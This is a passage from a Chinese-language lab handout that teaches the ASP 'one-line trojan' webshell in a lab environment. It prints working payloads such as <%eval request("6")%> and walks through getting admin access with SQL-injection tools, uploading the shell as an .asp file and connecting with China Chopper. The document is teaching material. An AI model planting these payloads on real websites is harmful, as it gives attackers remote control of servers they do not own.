精品文档---下载后可任意编辑 课程编写类别内容实验课题名称L003001041-一句话木马测试分析实验目的与要求熟悉一句话木马的原理,掌握一句话木马的使用以及防备方法VPC1(虚拟 PC)操作系统类型:windows server 2024 和 windows XP professional,网络接口:本地连接VPC1 连接要求PC 网络接口,本地连接与实验网络直连软件描述中国菜刀实验环境描述1、 学生机与实验室网络直连;2、 VPC1 与实验室网络直连;3、 学生机与 VPC1 物理链路连通;预备知识黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:<%execute request("value")%>其中 value 是值,所以你可以更改自己的值,前面的 request 就是猎取这个值<%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的有用当知道了数据库的 URL,就可以利用本地一张网页进行连接得到 Webshell。(不知道数据库也可以,只要知道%eval request("value")%>这个文件被插入到哪一个 ASP 文件里面就可以了。)这就被称为一句话木马,它是基于 B/S 结构的。实验内容理解该漏洞的实现过程实验步骤 学生登录实验场景的操作1、学生单击 “网络拓扑”进入实验场景,单击 windows2024 中的“打开控制台”按钮,进入目标主机。如图所示:我们把 windows2024 机器作为服务机(ip 地址为 192.168.1.154,不固定)2、学生输入账号 Administrator ,密码 123456,登录到实验场景中的 Windows server 2024,在该机器上搭建一个网站,并且能够正常访问。如图所示:精品文档---下载后可任意编辑3、学生输入账号 Administrator ,密码 123456,登录到实验场景中的 Windows XP Professional。如图所示精品文档---下载后可任意编辑4.打开 windows 2024 上的网站,我们通过名小子或者啊 D 猎取到了后台地址(这两个工具的使用方法可以参考明小子和啊 Dsql 注入实例),以及用户名和密码(均是 admin),然后登陆进去。如图所示:5.然后看到左边有一个文件上传菜单,点击它。如图所示:精品文档---下载后可任意编辑6.接下来我们可以在本地创建一个包含有一个一句话木马的 asp 文件。内容为“<%eval request("6")%>”括号里的 6 是咱们连接一句话的密码,密码也可以自行设置。如图所示:7.将刚才新建的文档,重命名为 7.asp。如图所示:精品文档---下载后可任意编辑。如图所示:9.点击打开后,进行上传,标题出写为 8,...
